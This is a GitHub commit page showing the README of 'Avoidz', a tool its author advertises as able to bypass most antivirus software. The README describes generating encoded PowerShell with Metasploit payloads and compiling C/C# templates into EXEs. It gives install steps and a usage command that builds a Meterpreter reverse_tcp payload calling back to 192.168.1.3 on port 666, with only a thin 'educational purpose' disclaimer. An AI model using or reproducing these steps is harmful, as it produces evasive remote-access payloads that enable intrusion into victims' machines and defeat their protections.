Skip to content

Commit b47a4d8

Browse files
authored
Update README.md
1 parent ae65d9d commit b47a4d8

File tree

1 file changed

+42
-2
lines changed

1 file changed

+42
-2
lines changed

README.md

Lines changed: 42 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,2 +1,42 @@
1-
# avoidz
2-
Avoidz tool to bypass most A.V softwares
1+
## Avoidz v 1.0
2+
Author: Mascerano Bachir [ dev-labs ]
3+
4+
5+
## Legal Disclamer:
6+
The author does not hold any responsibility for the bad use of this tool,
7+
remember this is only for educational purpose.
8+
9+
<br /><br />
10+
11+
## Description:
12+
This tool Generate encoded powershell with metasploit payloads,convert C & C# Templates to EXE's
13+
14+
## Screenshot:
15+
![pic1](http://i.imgur.com/v3Jwj5g.png)
16+
![pic2](http://i.imgur.com/L6GCvpJ.png)
17+
18+
<br /><br />
19+
20+
## Dependencies :
21+
1 - metasploit-framework
22+
2 - xterm
23+
3 - MinGW32
24+
4 - Monodevelop
25+
26+
## Download/Config/Usage:
27+
1º - Download the tool from github
28+
git clone https://github.com/M4sc3r4n0/avoidz.git
29+
30+
2º - Set setup script execution permitions
31+
cd avoidz
32+
sudo chmod +x setup.sh
33+
34+
3°- Run setup script
35+
sudo./setup.sh == to check dependecies
36+
37+
4°- Run avoidz tool == example
38+
sudo ./avoidz.rb == help command
39+
sudo ./avoidz.rb -h 192.168.1.3 -p 666 -m windows/meterpreter/reverse_tcp -f temp1 == generate
40+
41+
## video tutorial:
42+
Avoidz v 1.0 temp1 generate :

0 commit comments

Comments
 (0)